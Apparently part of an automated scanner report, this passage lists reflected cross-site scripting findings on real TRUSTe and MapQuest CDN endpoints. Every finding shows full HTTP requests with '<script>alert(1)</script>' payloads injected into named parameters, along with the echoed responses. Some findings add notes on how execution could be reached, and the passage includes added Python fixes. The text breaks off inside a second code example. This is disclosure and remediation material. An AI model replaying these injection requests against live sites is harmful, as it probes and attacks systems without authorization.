GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1977b3<script>alert(1)</script>5107276f391&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont1977b3<script>alert(1)</script>5107276f391_ib = '<div id="te-clr1-att02cont1977b3<script>
...[SNIP]...

5.64. http://choices.truste.com/ca [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 59666<script>alert(1)</script>9f57f5bbf8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25059666<script>alert(1)</script>9f57f5bbf8&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25059666<script>alert(1)</script>9f57f5bbf8,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...

5.65. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 6c672<script>alert(1)</script>96972f9f81a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr6c672<script>alert(1)</script>96972f9f81a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr6c672<script>alert(1)</script>96972f9f81a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...

5.66. http://choices.truste.com/ca [ox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 92b40<script>alert(1)</script>42ea5cf0318 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=2092b40<script>alert(1)</script>42ea5cf0318&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':2092b40<script>alert(1)</script>42ea5cf0318,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...

5.67. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied, without encoding, into a single-quoted string inside the JavaScript object literal te_clr1_att02cont1_bi ('plc':'tr...'). The payload 9fcac<script>alert(1)</script>5500482d71b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

The response is served as text/javascript and is evidently loaded as a script by the ad creative rather than rendered as a page, so the echoed <script> tag proves that the input reaches the script unencoded but would not execute as shown: inside JavaScript a <script> tag is a syntax error, not markup. Script execution from this position requires a payload that closes the single-quoted string, and it runs in the origin of whatever page loads this script with the attacker's parameters.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr9fcac<script>alert(1)</script>5500482d71b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr9fcac<script>alert(1)</script>5500482d71b','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...

5.68. http://choices.truste.com/ca [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied, without encoding or type checking, into the unquoted numeric slot 'width':300 of the JavaScript object literal te_clr1_att02cont1_bi. The payload 94668<script>alert(1)</script>e6e4c609a49 was submitted in the w parameter. This input was echoed unmodified in the application's response.

As with the other /ca parameters, the response is text/javascript, so the echoed <script> tag demonstrates unencoded reflection rather than execution. In a numeric literal position there is no quote to close; a payload would have to be valid JavaScript in its own right, and it would run in the page that loads this script with the attacker's parameters. A server-side integer parse of w would have rejected the payload outright.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=30094668<script>alert(1)</script>e6e4c609a49&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':30094668<script>alert(1)</script>e6e4c609a49,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...

5.69. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied, without encoding, into the single-quoted string 'zindex':'10002...' of the JavaScript object literal te_clr1_att02cont1_bi. The payload e18f7<script>alert(1)</script>1968cdcc2c0 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

The same caveat applies as for the plc and w parameters: the response is text/javascript, so the reflected <script> tag shows the input arriving unencoded in the script but does not execute there. A working payload would have to close the single-quoted string, and a numeric parse of zi on the server would have rejected this input.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002e18f7<script>alert(1)</script>1968cdcc2c0&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002e18f7<script>alert(1)</script>1968cdcc2c0','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...
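
The /ca findings (5.66 to 5.69) all have one cause: request values are pasted into a JavaScript object literal by string templating, numeric slots (ox, width) and single-quoted string slots (plc, zindex) alike. The following is an added example of how such a config endpoint is built safely; it is not TRUSTe's code. Every parameter is parsed into the type its slot expects and the literal is produced by a JSON serializer, so no request byte reaches the script unencoded. The set of allowed placement codes is an assumption (the report only shows 'tr' and 'ctr'), as are the numeric ranges; the parameter names and the te_clr1_<c>_bi variable shape come from the responses above.

```python
"""Typed construction of the te_clr1_<c>_bi configuration literal.

Added example, not TRUSTe's code. Parameter names (c, w, h, ox, oy, zi,
plc, iplc) and the output shape follow the /ca responses in the report;
PLACEMENTS and the numeric ranges are assumptions.
"""
import json
import re

PLACEMENTS = {"tl", "tr", "bl", "br", "ctr"}      # assumed whitelist of placement codes
CONTAINER_RE = re.compile(r"[A-Za-z0-9_]+")        # goes into identifiers and element ids


class BadParameter(ValueError):
    """Raised with the offending parameter name; the value itself is never reported back."""


def _int(params, name, lo, hi):
    # int() rejects every payload in the report: a trailing '<script>' or a
    # stray letter is not an integer, so no partial value survives.
    try:
        value = int(params[name])
    except (KeyError, ValueError):
        raise BadParameter(name)
    if not lo <= value <= hi:
        raise BadParameter(name)
    return value


def _enum(params, name, allowed):
    value = params.get(name, "")
    if value not in allowed:
        raise BadParameter(name)
    return value


def build_config(params):
    """Return the 'var te_clr1_<c>_bi = {...};' statement with typed, JSON-encoded values."""
    container = params.get("c", "")
    if not CONTAINER_RE.fullmatch(container):
        raise BadParameter("c")
    cfg = {
        "baseName": "te-clr1-%s" % container,
        "anchName": "te-clr1-%s-anch" % container,
        "width": _int(params, "w", 1, 2000),
        "height": _int(params, "h", 1, 2000),
        "ox": _int(params, "ox", 0, 2000),
        "oy": _int(params, "oy", 0, 2000) if "oy" in params else 0,
        "plc": _enum(params, "plc", PLACEMENTS),
        "iplc": _enum(params, "iplc", PLACEMENTS),
        # The original emits zindex as a quoted string; json.dumps quotes and escapes it.
        "zindex": str(_int(params, "zi", 0, 2147483647)),
        "containerId": container,
    }
    # json.dumps is the only thing that writes request-derived data into the script.
    return "var te_clr1_%s_bi = %s;" % (container, json.dumps(cfg))


def rejected(params, name, payload):
    """True if build_config refuses `payload` in parameter `name` (used for the checks)."""
    try:
        build_config(dict(params, **{name: payload}))
    except BadParameter as exc:
        return str(exc) == name
    return False


if __name__ == "__main__":
    # Parameters from the report's request (constructed dict, constant values as captured).
    good = {"c": "att02cont1", "w": "300", "h": "250", "ox": "20",
            "zi": "10002", "plc": "tr", "iplc": "ctr"}
    print(build_config(good))
    for name, payload in [("ox", "2092b40<script>alert(1)</script>42ea5cf0318"),
                          ("plc", "tr9fcac<script>alert(1)</script>5500482d71b")]:
        print(name, "rejected:", rejected(good, name, payload))
```

Rejecting a bad parameter with its name rather than its value also removes the second reflection pattern seen later in this report (the /coverage 400 response), where the rejected input is echoed back verbatim.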

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed476<script>alert(1)</script>54ce9dc2f2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverageed476<script>alert(1)</script>54ce9dc2f2f?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 247

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /coverageed476<script>alert(1)</script>54ce9dc2f2f was not found on this server.</p>
...[SNIP]...

5.71. http://coverage.mqcdn.com/coverage [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the cat request parameter is echoed, without encoding, as the body of a 400 BAD REQUEST response served as text/plain (the body is the rejected value in single quotes). The payload a9775<script>alert(1)</script>de994233d1b was submitted in the cat parameter. This input was echoed unmodified in the application's response.

Because the declared type is text/plain and not HTML, a browser that honours the Content-Type renders the script tag as text. The reflection becomes cross-site scripting only where a client sniffs the body as HTML; the response sends no X-Content-Type-Options: nosniff header to forbid that. The underlying defect is the same as in the other /coverage findings: rejected input is reported back verbatim instead of by field name.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csata9775<script>alert(1)</script>de994233d1b HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46

'sata9775<script>alert(1)</script>de994233d1b'

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The value of the jsonp request parameter is used, unvalidated, as the JSONP callback name and is written at the start of the text/javascript response body. The payload 4ce5e<script>alert(1)</script>96b4cb561f0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This is the classic unvalidated JSONP callback: everything before the opening parenthesis is attacker-controlled JavaScript source. As served (text/javascript) a <script> tag is a syntax error rather than executable markup, so the proof of concept shows reflection; execution in this context needs a payload that is valid JavaScript, loaded by a victim page with the attacker's parameters, or a browser that sniffs the body as HTML (no X-Content-Type-Options: nosniff is sent). The fix is to accept only callback names matching a strict identifier pattern and to reject everything else without echoing it.

Request

GET /coverage?format=json&jsonp=MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1138

MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqacopyswitchdark'>
...[SNIP]...

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /coverage

Issue detail

The name of an arbitrarily supplied request parameter is copied, without encoding, into the text/javascript response: the entire raw query string is echoed as the second argument of the JSONP callback, inside a double-quoted JSON string. The payload b8261<script>alert(1)</script>64e42659620 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

Inside a double-quoted string in a script response the <script> tag is inert text, so, as for the jsonp parameter, this demonstrates reflection rather than execution. A double quote in the query string is the character that would matter in this position, and the captured response gives no evidence either way of how one is handled. Echoing the raw query string back to the caller adds nothing the JSON data does not already carry and should be dropped.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1 HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1100

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqaco
...[SNIP]...
yrights": [{"text": "i-cubed", "html": null, "group": "Imagery", "id": "i3"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1")
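
The four /coverage findings (5.70 to 5.73) come from one endpoint that trusts its callback name, echoes rejected values in its error body and appends the raw query string to its JSONP output. Below is an added example of the vulnerable pattern beside a hardened version, written as a WSGI application because the Server header shows mod_wsgi/Python; it is not MapQuest's or mqcdn.com's code. The coverage data is a constructed stand-in, the allowed cat values ('map', 'hyb', 'sat') are taken from the requests in the report and assumed to be the full set, and the callback pattern is the usual dotted-identifier rule. The requests fed to it in the checks are the ones captured above, so it runs offline.

```python
"""Vulnerable and hardened JSONP handling for a /coverage-style endpoint.

Added example, not mqcdn.com code. COVERAGE is a constructed stand-in for
the real data; ALLOWED_CATS and CALLBACK_RE are assumptions.
"""
import json
import re
from urllib.parse import parse_qs

# A dotted JavaScript identifier path such as MQA._covCallback: letters, digits,
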